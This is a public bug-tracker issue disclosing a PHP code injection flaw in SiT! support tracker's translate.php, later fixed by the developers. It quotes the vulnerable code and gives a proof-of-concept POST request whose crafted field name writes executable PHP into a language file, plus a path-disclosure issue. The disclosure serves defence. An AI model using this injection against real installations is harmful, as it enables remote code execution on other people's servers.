SiT! Bugs

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0001737SiT!securitypublic2011-11-13 19:162012-07-07 18:10
ReporterEgiX 
Assigned Toivan 
PriorityurgentSeveritymajorReproducibilityalways
StatusclosedResolutionfixed 
PlatformOSOS Version
Product Version 
Target Version3.66 LTSFixed in Version3.66 LTS 
Summary0001737: PHP Code Injection Vulnerability
DescriptionHi,
I found a critical security vulnerability that could allow malicious users to execute arbitrary PHP code.
The vulnerable code is located in 'translate.php':

234. foreach (array_keys($_POST) as $key)
235. {
236. if (!empty($_POST[$key]) AND substr($key, 0, 3) == "str")
237. {
238. if ($lastchar!='' AND substr($key, 3, 1) != $lastchar) $i18nfile .= "\n";
239. $i18nfile .= "\${$key} = '".addslashes($_POST[$key])."';\n";
240. $lastchar = substr($key, 3, 1);
241. $translatedcount++;
242. }
243. }
244. $percent = number_format($translatedcount / $origcount * 100,2);
245.
246. $i18nfile .= "?>\n";
247.
248. // CJ 02 Jun 11 - Unfortunately mailto has a restriction for attaching body text, so we cannot do that here
249. echo "

".sprintf($strSendTranslation, "<code>{$filename}</code>", "<code>".APPLICATION_I18NPATH."</code>", "<a href='mailto:sit-translators@lists.sitracker.org?subject={$lang} translation&body={$percent} Percent Complete %0A%0A'>sitracker-devel-discuss@lists.sourceforge.net</a>")."

";
250. echo "

{$strTranslation}: {$translatedcount}/{$origcount} = {$percent}% {$strComplete}.

";
251.
252. $myFile = APPLICATION_I18NPATH."{$filename}";
253. $fp = @fopen($myFile, 'w');
254. if (!$fp)
255. {
256. echo "<p class='warning'>".sprintf($strCannotWriteFile, "<code>{$myFile}</code>")."

";
257. }
258. else
259. {
260. fwrite($fp, $i18nfile);
261. fclose($fp);

An attacker could be able to inject arbitrary PHP code into $i18nfile variable because at line 239 the $key variable isn't properly sanitized.

For example he could send this POST request:

POST /sit-3.65/translate.php HTTP/1.0
Host: 127.0.0.1
Cookie: SiTsessionID=b7iiuibskjf07unogbnrnegka6
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
Connection: close

mode=save&lang=sh&str;phpinfo();//=1

after processing this request, a new file will be created (/sit-3.65/i18n/sh.inc.php) with this content:

<?php

$languagestring = ' (sh)';
$i18ncharset = 'UTF-8';

// list of strings (Alphabetical by key)
$str;phpinfo();// = '1';
?>

Furthermore, access directly to for e.g. http://127.0.0.1/sit-3.65/translate.php?mode=save [^] will reveal the full installation path of the application.

Regards!
TagsNo tags attached.
Attached Files

- Relationships

-  Notes
User avatar (0004335)
paulh (administrator)
2011-11-13 19:57

Hi EgiX, thanks for the report, this code injection is fixed in the current SVN trunk (r7430 cleaned this variable).

The second issue with revealing the full installation path is still present and I agree we should just so the relative part.

I'm not sure when we're planning to release 3.66 though I'm sure ericthefish will be along shortly.
User avatar (0004476)
ivan (administrator)
2012-05-05 15:52

svn r7508 removes the display of the full path, we now only show the relative part. - thanks for the bug report.

- Issue History
Date Modified Username Field Change
2011-11-13 19:16 EgiX New Issue
2011-11-13 19:16 EgiX Status new => assigned
2011-11-13 19:16 EgiX Assigned To => ivan
2011-11-13 19:57 paulh Note Added: 0004335
2012-03-26 03:54 anonymous Note Added: 0004468
2012-03-26 03:54 anonymous Status assigned => feedback
2012-03-26 03:55 anonymous Note Deleted: 0004468
2012-05-05 15:21 ivan Status feedback => confirmed
2012-05-05 15:21 ivan Target Version => 3.66 LTS
2012-05-05 15:28 ivan Status confirmed => assigned
2012-05-05 15:52 ivan Note Added: 0004476
2012-05-05 15:52 ivan Status assigned => resolved
2012-05-05 15:52 ivan Fixed in Version => Current SVN
2012-05-05 15:52 ivan Resolution open => fixed
2012-07-06 14:13 Tomse Fixed in Version Current SVN => 3.66 LTS
2012-07-07 18:10 ivan Status resolved => closed


Copyright © 2000 - 2014 MantisBT Team
Powered by Mantis Bugtracker